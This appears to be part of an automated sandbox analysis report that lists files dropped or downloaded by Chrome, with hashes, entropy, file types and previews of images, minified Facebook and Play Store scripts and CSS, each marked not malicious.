                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 32x32, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):256
                                                                                                                                                                                                                                  Entropy (8bit):6.9836276016676955
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:I3ZRGRbZD1dI3YIciub7g0HbwDmw9EyxNYS3Td/:I3zOZ1dOcg07wvE4NbTl
                                                                                                                                                                                                                                  MD5:EA315258B42B9D52F560DD7A7FB5B1F2
                                                                                                                                                                                                                                  SHA1:41F5D66E90EA567177BE1A3BA642069BC15C4D0D
                                                                                                                                                                                                                                  SHA-256:4DAE512DA7DD8BD31ED7E5C38AC0A6068EEE41136CA3A92B4237DA90EEB66E1B
                                                                                                                                                                                                                                  SHA-512:B9826CDDA453126342C804885F3F0BC1BC338BD46B24C5A89970C547477F64F8EBAD636A19D7397DDB6956CC4465CE11C34F815D8A8A32F23E7C26077DF90BA5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8 .........* . .>m2.G.".!(.....@.#.V......)...........q..$w9...........m.;...{.....t.|..B....?.Z.......EQ..i......A...EI:..RZ...Y~.R..4L..>Y...}<.!.C........'.P.u.7[.eu].4Zk.....Q.o..z.....|..%....c..~.vB.....&Ay.!.....@...
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):61750
                                                                                                                                                                                                                                  Entropy (8bit):7.988653246685742
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:h3m0KFIOGUTYAdtjnUWO/P7ZZ2V6shE/9ZUhI:hW0bVGYMtjnUdlZ9sk3
                                                                                                                                                                                                                                  MD5:1F5C22BE9AD755701E8998B02B244060
                                                                                                                                                                                                                                  SHA1:40A9616FBC9436BF2D94169B5334685ACE4B08EE
                                                                                                                                                                                                                                  SHA-256:1D1C4C356F85922F003AF2D6FDBF39AAAFB830F9ECAFD91A83F061FACCD0155D
                                                                                                                                                                                                                                  SHA-512:25DEB967053135B20385E4EBDF0EDF621511CA7BDAA5371E7C6AD3C625E3D8BAD2D630CA6B222E6BBC2B658E2DDD4645AB24700CF3C4F6BE0CF08F3A8B0F30AD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8L!.../..?.M@.$7l3.... .`IVJ.....?I)..?V.2.a?...}K.z........"."..D........to....iI....s.nE.....<>.......o...{....A..F.2.?......*.....%`<.......P.7....c.....|]...m....Z..o\...Yld|)rOU.g.......Y..2.....uy.4.o.x.q.E....D.A.0......nq#.....tC.H....\Oz..$O.q|.....F...`.TU..HA.....\.m...pe......h.mIU..+c..S93s.=#........L..-...,..M%f...$.JF....[@....8!A.....IVm[y....=.>........L..A.4.f..8k........t....h.W...1.j.9..9.#...H.m.i.#$#.{.......K&...|C...m........ ..X8....G..?.~4..O.ro..]y..O...dt}..:..m.....=......>.?...!..m..&...U...d..\.. .m=.}}.Q..%.1..!'.]x...-U....)uY.f....!.z..@.......2..fiR.Te..:....~..k........."....."..F&{..z...^_.wu.... .G..$.M.,U3..d.{....U..?..@(.|.#....cWu'....1(..M..|d.......Tl6.$.)...CY.-.).Y.;..$...)...?...>xp...G._E8.34.u.[...g.9n..{...Ql..|..,.'A......U.........^lv.8.#t..-gW...QcSm.y;.Hy;.7K..L]t.aX.9%96..qT*~V.2.....u.......s..9.......;..0%2SG..O'l...<`...e..5..!.....4..H....ot.x.>b.iU...]........
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (7780)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):45002
                                                                                                                                                                                                                                  Entropy (8bit):5.45952480481115
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:/+7HfJzz/IixGgUwVy8CZD4cTxW5lVPgrfwhRBB9Y6HrjIyKqe08Hfb:W7HfvUwVy864ZL+fwh4z/b
                                                                                                                                                                                                                                  MD5:30D99FF9D0130FF15ECD46F9C4816BA6
                                                                                                                                                                                                                                  SHA1:BD98D3047B1855D008E615077D155BFEE701BB9F
                                                                                                                                                                                                                                  SHA-256:0C31EC8A54F2AF241561936BB614921C725876D403ECC78C40D2D4FEB7F2E605
                                                                                                                                                                                                                                  SHA-512:E86CE3219C565CA83FB16235980ACDB10B2E6B94028E6BA2F41701368A27600C8ADF5BA7071251E30E1D52F5958D59504F2349DC5934CC7569CEB5A085B19222
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("ActorURI",["ActorURIConfig","URI"],(function(a,b,c,d,e,f,g){var h;function a(a,b){return new(h||(h=c("URI")))(a).addQueryData(c("ActorURIConfig").PARAMETER_ACTOR,b)}g.create=a;g.PARAMETER_ACTOR=c("ActorURIConfig").PARAMETER_ACTOR}),98);.__d("BladeRunnerDeferredClient",["Promise","nullthrows","requireDeferred"],(function(a,b,c,d,e,f,g){var h;a=function(){function a(){this.$1=null}var d=a.prototype;d.requestStream=function(a,b,d,e){this.$2();return c("nullthrows")(this.$1).then(function(c){return c.requestStream(a,b,d,e)})};d.logInfo=function(a){this.$2();return c("nullthrows")(this.$1).then(function(b){b.logInfo(a)})};d.bumpCounter=function(a){this.$2();return c("nullthrows")(this.$1).then(function(b){b.bumpCounter(a)})};d.$2=function(){this.$1==null&&(this.$1=new(h||(h=b("Promise")))(function(a){c("requireDeferred")("BladeRunnerClient").__setRef("BladeRunnerDeferredClient").onReady(function(b){a(new b())})}))};return a}();d=new a();g["default"]=d}),98);.__d("Bla
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:MS Windows icon resource - 3 icons, 48x48, 24 bits/pixel, 32x32, 24 bits/pixel
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12014
                                                                                                                                                                                                                                  Entropy (8bit):5.8597190788401115
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:L7xWVSgHQUkVbBQZf8POXQu2jMLlZYrZ7667V776+:L7xWVSgiV27QfjMLcrj
                                                                                                                                                                                                                                  MD5:87052396F5FFD63B642D1BAB54E7EDB7
                                                                                                                                                                                                                                  SHA1:F3E75DDE1FAD3A5FE639E3D0C04122FCFAB918E2
                                                                                                                                                                                                                                  SHA-256:EA54FEA4CE7FCA6339E5B437CA43CBD46C84AA46477BE66436608B5FB0A9E02C
                                                                                                                                                                                                                                  SHA-512:84F96774BF4E8CE6BDFFC68AB6ADFBAA7508BD8E9A3372A33C0032FB519BF51A6AFB34CD70CE8A84C32A1F4BEC2442B87CB5CBEE86EDD468D510E502705D4788
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:......00..........6... ......................h....)..(...0...`................................r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..v..v..u..v..v..u..u..u..v..u..v..v..v..u..v..v..u..u..u..v..u..u..v..v..v..u..v..u..u..u..v..u..u..v..v..v..u..v..v..u..u..u..v..u..u..v..v..u..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..}..}..}..}..}..}..}..}..}..}..}..}..}..}.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):74176
                                                                                                                                                                                                                                  Entropy (8bit):7.9956452812069765
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:1536:Gs0Bn7m1EWnnvkinvpFgcEvXdwgGkEHDotAuZnlOHghbh5tBOCYMj:kyVvkGhFgXvXygFQoNtkEh5uCR
                                                                                                                                                                                                                                  MD5:92D639281E9F4208F083A85CA8CEDFC9
                                                                                                                                                                                                                                  SHA1:7F0E13C4BF4EAA97E2964B425D95C639F9C9F244
                                                                                                                                                                                                                                  SHA-256:4CF59358414C932FD436A5720B7C3E5B87E41C2A88C93CF76445374F8E639039
                                                                                                                                                                                                                                  SHA-512:012C2FF6C60C48E847FA9FE0B67531801570612F0682C9D8D39A0FE046E1C4CA6C68B7D90297D7F46B5C0A95BCCA56E562240F8E0CD0D27E96D9061E042398DA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/LByrur1mTmPeNr0ljI-uAUcct1rzmTve5Esau1SwoAzjBXQUby6uHIfHbF9TAT51mgHm=s256-rw
                                                                                                                                                                                                                                  Preview:RIFF.!..WEBPVP8L.!../..?.M@.d.n3..x.#.....O.....y.?...".{v.[.$)3...~.s3....v.&.H."l.j.$.../.wOuf.[.b...ve~..D..Tu%...~..1...u.][.u.#.~. ...S_...4Ii..V}1..}..a....'.m...........J...km..)IyN.....t.]3G-i.;.G~.....:m.{...1s/$.....x.83c...b.3.}.......Y>..|..9.@@......... .~.E..zp......(.(@J>%]d.9.m..bg_...T2.FV..}8.L...~!O...Ng^..-(H.s..$.tw...."..9o......].....z...{....!....&Y....>.....s..-U..F..MO.3..<..Y.,!../B....!~...My..Um..i. ..&|..sg....Q.W...J..L.A.c.1...moZ.=...."...xx2.....\.'@B&..?..)J....B..........6..B@D...E..X.R...U..R4R<Z..9;.!...B."...:.<..]R.H$`..!.H..!.DB..........zW.I.J.z.)...'.......!...1.njS].....B.G..4.p.T.m..xJ..`....I=.|......f......^....O...K73....K,Q....O}4..r*p..7...P.w.s..!s...Q|..d......y>jw... ......X...9.gN.*...|..Q.v.N~......|.......dI7.Q..w.>d:l,......'.*8.P.X..J.Bz.|xs...)%.w.4..8....f.............n.u.,.s.p..r..S1....I9^..*V..`.,.d+....E{f=.U....JJ..m..e8..j..z\...X....k.../<..S........9.....\.J9.....a..e..... ...K.)
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):948450
                                                                                                                                                                                                                                  Entropy (8bit):7.994527784735151
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:24576:f9nhOWDTsh3t1hl1dGvZVKhH2D6bmoNGHiJjTZv6kGXzR:f9hOKTw3HX1ohQhWD6bLNGuRPwN
                                                                                                                                                                                                                                  MD5:856A66A0B50F88685F8A15DD3E79EF08
                                                                                                                                                                                                                                  SHA1:3C7A567F82FB6FE827AEABD152B7A3114486691B
                                                                                                                                                                                                                                  SHA-256:A83E00BF0AA7EC6B597E16012829EBD0E09C352A23BCDE1FB9AB18362334928C
                                                                                                                                                                                                                                  SHA-512:36541CDC5F82C924BE719791E1A80D62FFBD484A9A16167C14DAAD7A0FE77770648315ABB7D13FFF0D6622912E9005CD2885C4BE0D1ED653B61A1BB388A9D17E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/V9eV8_8k5ssFM3cD8eA0oIYP-1mOekwcCFsH5cEWoOLvJ8EmUJYFRkdwg1d-lc1s9Q=w2560-h1440-rw
                                                                                                                                                                                                                                  Preview:RIFF.x..WEBPVP8L.x../.H6...E....l...m.nJ.].m;.m.....$.1..{/....(oe.m.m.l..m.6o.#.....#..{..y..>.Zi}x..c.....@.aP.......2.F.K..$<..;@...=..0.-.....q?n.%=n.`FC..H.fj......vP..4r.O.F...N3^.D..Yx..I.f...:.DG(Rk..........{. ..R.~.....p....` q..v5.'.D....H....-:s....m.?;;......N0..z...F..K....b.).Q.o....N4,..=}..v. ..{AC....h.FG...L...".g....(t...H.JBPH.l.w...A..a(....O.*|H..............p..8,.2../..O...e Pd...C.)....x.z..A......U84..vEY..h..`r....:W\.,...E...uT...O..~..bL....H@#..B.N..#.5....H.W$O7.h..!.H.I^SN.[d.>.|]n.@5...O.y..%.A..#:..W.8l.A.....R.....5v....6..;,.L......|..K....)....A....3...3(..q....fxF.(......B.M@Y...JH..J....$..@...H.B.GD.a......H..^.y.i....(..4..M.h.,y.. s:#.c.(.#.)...bH.d...W6..8.Hj.z3..Y..x.....Y.uh.rS<.........9W...?,.V.FNK..y.n....?...)......*.~.LA.5..v..a79:la.c . ..4B.v...K...A..<..+e.....+.\.H..h......ZTb..j!R.....~?.....:.|..E...d+u.T.Io^7.........D.....:-.r[Z.;D..z ;= ..Ac#,p.....%.PP.&..e....E..M.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (821)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7626
                                                                                                                                                                                                                                  Entropy (8bit):5.215559608926212
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:OtQ0m8mBOZgS9tn0Ll9829FAeHlVPrMNW:OtFuSD4829FAeHzPAW
                                                                                                                                                                                                                                  MD5:33AF753815E0763128B33C38F393AF19
                                                                                                                                                                                                                                  SHA1:FD81C07EDD497B91F91629687D2AB6976F287E17
                                                                                                                                                                                                                                  SHA-256:A7A8465112A5F495E5C95139568A59BF35B3116624A5861B71472070520D699E
                                                                                                                                                                                                                                  SHA-512:D5981A0D80035A3E0B8EFBE12B90C5E82A53F8C2CBC100001D344DC645B07A76DB3B75D863A5BB733F54B9E13B4C0A515B63041F50DCFC9AC750C092C436DBF5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_ember_auto_import_=self.webpackChunk_ember_auto_import_||[]).push([[26],{71026:function(e,t,n){n.r(t),n.d(t,{environment:function(){return a},eventRecorder:function(){return F},immediateEventRecorder:function(){return q},logger:function(){return D},network:function(){return E},setEventQueuePostIntervalEnabled:function(){return N}}).var s=n(76588),r=n(24178),u=n(32722),o=r.SC.attachDelegate,a={setDelegate:function(e){return o(this,e)},globalScope:function(){return window}},i={AJAX:"ajax",AJAX_SYNCHRONOUS:"ajaxSynchronous",IMAGE:"image",BEACON:"beacon"},v=r.vc.metricsDisabledOrDenylistedEvent,c=r.vc.removeDenylistedFields,l={},p=["dsId","consumerId"].function f(e,t,n){var s=null.return n&&!v.call(u.Z,n.eventType,t)&&(c.call(u.Z,n,t),m(t,n),e.apply(null,Array.prototype.slice.call(arguments,1)),s=n),s}function d(e,t){l[e]=l[e]||{},l[e]=t}function Q(){l={}}function m(e,t){l[e]=l[e]||{},l[e].anonymous&&p.forEach((function(e){delete t[e]}))}var y=r.SC.attachDel
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):338
                                                                                                                                                                                                                                  Entropy (8bit):5.237674105306844
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:kRZzRxVvnC/SoD0EQAuGNG/QVIF5hi8YSegZe+wQRaNw6JpyxZRNlad0:kRZTFC/SM9vI/AIpiJyZR8kbRN20
                                                                                                                                                                                                                                  MD5:6268C5E29B6BCA2A8AEDEE7BBF5EF0A2
                                                                                                                                                                                                                                  SHA1:B1671362AB66B7F96DD9B64586F4BF760B4FFD29
                                                                                                                                                                                                                                  SHA-256:1EFE5F3A38CB06216290946353D0C7517F9F6851FEBBD9ED8C3F8B6772E729A0
                                                                                                                                                                                                                                  SHA-512:FD4633EA7B084B61292FA9207711A6A38B91AD9E411D0659F02BEEE6EE28A1674CBC720130E3891807DA5E1815CDC68E75F90EC7D0D899C07E295BBBED793430
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://www.gstatic.com/_/boq-play/_/js/k=boq-play.PlayStoreUi.ru.rIMe_465lJE.2021.O/ck=boq-play.PlayStoreUi.Y1yArtXW1Kk.L.B1.O/am=R7cZwOj6QDAJDPAPHgdjAQ/d=1/exm=A1yn5d,A7fCU,ArluEf,BBI74,BVgquf,BfdUQc,EEDORb,EFQ78c,FuzVxc,GkRiKb,HnDLGf,I8lFqf,IJGqxf,IZT63,IcVnM,JNoxi,KUM7Z,L1AAkb,LCkxpb,LEikZe,M2Qezd,MI6k7c,MdUzUe,Mlhmy,MpJwZc,NkwaS,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6sQOc,PHUIyb,PrPYRd,QIhFr,RMhBfe,RQJprf,RqjULd,SdcwHb,SpsfSb,UINLVc,UUJqVe,Uas9Hd,Ug7Xab,Ulmmrd,V3dDOb,WO9ee,XVMNvd,Z5uLle,ZDZcre,ZfAoz,ZwDk9d,_b,_tp,aW3pY,aurFic,byfTOb,chfSwc,dfkSTe,e3Zld,e5qFLc,ebZ3mb,fKUV3e,fPcQoe,gKWqec,gychg,hKSk3e,hc6Ubd,iAQMie,kJXwXb,kWgXee,kjKdXe,kr6Nlf,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mdR7q,n73qwf,oEJvKc,ovKuLd,pCKBF,pYCIec,pjICDe,pw70Gc,q0NEmc,q0xTif,qqarmf,rpbmN,s39S4,sOXFj,soHxf,tKHFxf,uj8DUc,vrGZEc,w9hDv,wW2D8b,wg1P6b,ws9Tlc,xQtZb,xUdipf,yDVVkb,yNB6me,ywOR5c,z5Gxfe,zbML3c,zr1jrb/excm=_b,_tp,searchview/ed=1/wt=2/ujg=1/rs=AB1caFXJl0m234JZdkIlc9Y8a_1vUWHvZw/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;Hs0fpd:jLUKge;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;Rdd4dc:WXw8B;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;nAu0tf:z5Gxfe;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;sgjhQc:bQAegc;wR5FRb:O1Gjze;xqZiqf:BBI74;yEQyxe:TLjaTd;yxTchf:KUM7Z;zxnPse:GkRiKb/m=GjTCAc"
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.u("GjTCAc");._.qr(_.MBa,class extends _.rr{constructor(a){super(a.ta)}H(){return"GjTCAc"}N(){return!0}Xa(){return _.n6}});_.$q.GjTCAc=_.hA;.._.w();.}catch(e){_._DumpException(e)}.}).call(this,this.default_PlayStoreUi);.// Google Inc..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4083)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4295
                                                                                                                                                                                                                                  Entropy (8bit):5.30261790907087
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:xqYiUs0iqHjly3HHe+F03J8ZwEuSs86tBjjHyRC:kjVRqZy3xF03J6ZuSsJvXD
                                                                                                                                                                                                                                  MD5:65751269352F5C7FF3E35C83A025E2CE
                                                                                                                                                                                                                                  SHA1:BEC653BBE4E1160BC9E36F2A9F105B52842883C5
                                                                                                                                                                                                                                  SHA-256:14F90CE2F1A178960CE7F253D6FC129D6D0C844600947E9D8CBCE565F88C898E
                                                                                                                                                                                                                                  SHA-512:E44A09A92CFDF22D30E8BBACFAB25FACF64CD519C5596DF3D18D5AAD0D8FC21352293B02320ECADE7B444BB6097A01B679F27686E8CD4726B895BD358158082C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("XDOMScannerResultsControllerRouteBuilder",["jsRouteBuilder"],(function(a,b,c,d,e,f,g){a=c("jsRouteBuilder")("/shared/user_preferences/",Object.freeze({}),void 0);b=a;g["default"]=b}),98);.__d("DOMScanner",["Base64","ConstUriUtils","DOMScannerConfig","FBLogger","JSScheduler","Promise","WebStorage","XDOMScannerResultsControllerRouteBuilder","cometAsyncFetch","isFacebookURI"],(function(a,b,c,d,e,f,g){"use strict";var h,i,j,k=0,l=!1,m=!1;function n(a){return a.startsWith("data:")&&a.includes(";base64,")}function o(a){return n(a)?!1:q(a)}function p(){var a=[],b=document.getElementsByTagName("*");for(var c=0;c<b.length;++c)b[c].shadowRoot!=null&&a.push(b[c]);return a}function q(a){a=d("ConstUriUtils").getUri(a.toString());return a==null?!1:!c("isFacebookURI")(a)}function r(){var a=[],b=p();for(var c=0;c<b.length;c++){var d=b[c],e=d.getBoundingClientRect();e=JSON.stringify({position:{b:e.bottom,l:e.left,r:e.right,t:e.top},size:{h:e.height,w:e.width}},null,2);a.push(["s
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):338
                                                                                                                                                                                                                                  Entropy (8bit):5.214146575264509
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:kRZzRxVvn0/hZop/AuGNG/QVIGeIhigVQuYGwQRaNw6JpyxZRNlad0:kRZTFOZISI/AI9yigiup8kbRN20
                                                                                                                                                                                                                                  MD5:EAE9B28A5A6B8D61F4EFA51B4BB6AC47
                                                                                                                                                                                                                                  SHA1:0FAD8F193FC3DB5B252BE2FC4969C88F8BB62E7E
                                                                                                                                                                                                                                  SHA-256:3AFFA28217A635DF9AC9D3900D4829C7C6346981EFA68C0338DF31F464434C54
                                                                                                                                                                                                                                  SHA-512:BE005B6494F2D30749475B0FA74A8DFC630018192A8B0D91E30BBB4165EA96CB31B2EABCF191BF7F93A3815A57DC300BF0B9F73167A83AD86B0157919847A69B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.u("qk5AGd");._.qr(_.oAa,class extends _.rr{constructor(a){super(a.ta)}H(){return"qk5AGd"}N(){return!0}Xa(){return _.p5}});_.$q.qk5AGd=_.wz;.._.w();.}catch(e){_._DumpException(e)}.}).call(this,this.default_PlayStoreUi);.// Google Inc..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 480x360, components 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):14488
                                                                                                                                                                                                                                  Entropy (8bit):7.877375184944868
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:i+nkZheKRIwrm/a48si3/C1UKkb/0XUTkxXqDB/8:i+nkZIK+wrm/mP0K0XWdN/8
                                                                                                                                                                                                                                  MD5:4544570A922C51E96CB2F1BB67A0608E
                                                                                                                                                                                                                                  SHA1:ED99AD69140AA35B702FFDC6E0AABB78F529E18D
                                                                                                                                                                                                                                  SHA-256:B1A9CA2D487FBA3195C3B53218A97328A31C10F45686550704957A8913BABB87
                                                                                                                                                                                                                                  SHA-512:A79079CF4B0E3FA0B91F61C0AF75DA7F0E947B09FB0CA9D7FC2ACDB5E2A98604B7AE78EBBAD6AF3DF95D8FA54EE970DA1D64770384A1A273311A81D7B5B13E20
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:......JFIF..............................%%..""%%%%..'10-'--5=PB58K9--DaEKSV[\[2AemdXlPY[W......./..0W?57WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW......h....".......................................C.......................!..1AQ..Raq...."2B...Sbr..#3...Cs..4....c................................(........................!1.AQ"2a.....q............?........................................................................................................................................................................%...=..5.. %...=...X"._@...>... %...=].CK.@Z..Od.......7.ib..],......~A....o.l..t...::|c....d...........'.<.r..D..#.._..)....`7...G^.....z..T...|2......./..:?...9}..u.....I.s.?gFu........_yC.O.G..1.yC.O.Nk....5......1.yC.O.C.........7.................."?.....?.5...M.q.s t..V+.G.O.F.......S....n?.G:......m.k.m..g..q.7.U.O.m.K......<...S.y.#[3.M..Q..E.y. .c......YH..hy..5e..g...U8...9>.,....<...S.9.!.?....^z*...~Bt]N1......e /-.S.y. .c....... ].c...
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (58132)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):536282
                                                                                                                                                                                                                                  Entropy (8bit):5.292143500030478
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:8jo5iuKWmTUoKtfzNdK6neczoPGUd4Kyu:8jo5j4AFtfzvrwvSKyu
                                                                                                                                                                                                                                  MD5:6034CA9BCA643FF2E70B2BE7FFF87AE4
                                                                                                                                                                                                                                  SHA1:31A4824AEF5960C655DC10B76BADD3ECCD7E8DE3
                                                                                                                                                                                                                                  SHA-256:D75506024748F28A97487A93F4DC4AEA752CF5A32B2AD7B19B844D35524A1908
                                                                                                                                                                                                                                  SHA-512:916333AAEFFCC0E6CB58E2279471DD7225B8C999B87B51EA9DC5E7147E38876DD3CFF503E993264BCF3298EDB3EF33750C0824897F65D5D9ABBB4A9B2DA1DA4A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://static.xx.fbcdn.net/rsrc.php/v3/yG/l/0,cross/sz9JnoPJuhF.css"
                                                                                                                                                                                                                                  Preview:.x18l19kd{--accent:var(----accent,revert)}.x1b0580a{--primary-text:var(----primary-text,revert)}.x1i2ug1n{--primary-button-background:var(----primary-button-background,revert)}.x1obymqx{--secondary-text:var(----secondary-text,revert)}.x1v5e2he{--secondary-icon:var(----secondary-icon,revert)}.x6vdh9z{--primary-icon:var(----primary-icon,revert)}@keyframes xct2g7x-B{0%{transform:scale(1)}25%{transform:scale(1.2)}50%{transform:scale(.95)}100%{transform:scale(1)}}.xixsox3{--primary-deemphasized-button-text:var(----primary-deemphasized-button-text,revert)}.xkwi5dx{--primary-deemphasized-button-background:var(----primary-deemphasized-button-background,revert)}.xtnm4v3{--hosted-view-selected-state:var(----hosted-view-selected-state,revert)}.xtt6w6i{--highlight-bg:var(----highlight-bg,revert)}.xv8rz1w{--primary-button-text:var(----primary-button-text,revert)}.x168l2et{scroll-snap-type:y mandatory}.x1hl2dhg{text-decoration:none}.xe8uvvx{list-style:none}.xhfbhpw{scroll-snap-type:x mandatory}.xmql
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):339
                                                                                                                                                                                                                                  Entropy (8bit):5.230330389237522
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:kRZzRxVvnmo7YAuGNG/QVI3KhiYtGeozwQRaNw6JpyxZRNlad0:kRZTFmmI/AI3siwDkbRN20
                                                                                                                                                                                                                                  MD5:8DEAA0BB0FDB9791671B9B16A6E4544A
                                                                                                                                                                                                                                  SHA1:B4132F810CD1D2A3E933558111EFDA97E075D186
                                                                                                                                                                                                                                  SHA-256:A79468E18D691FC7DB07E5FDC22EEC64BE745D4ED4A9093E79AF67E41E065F5B
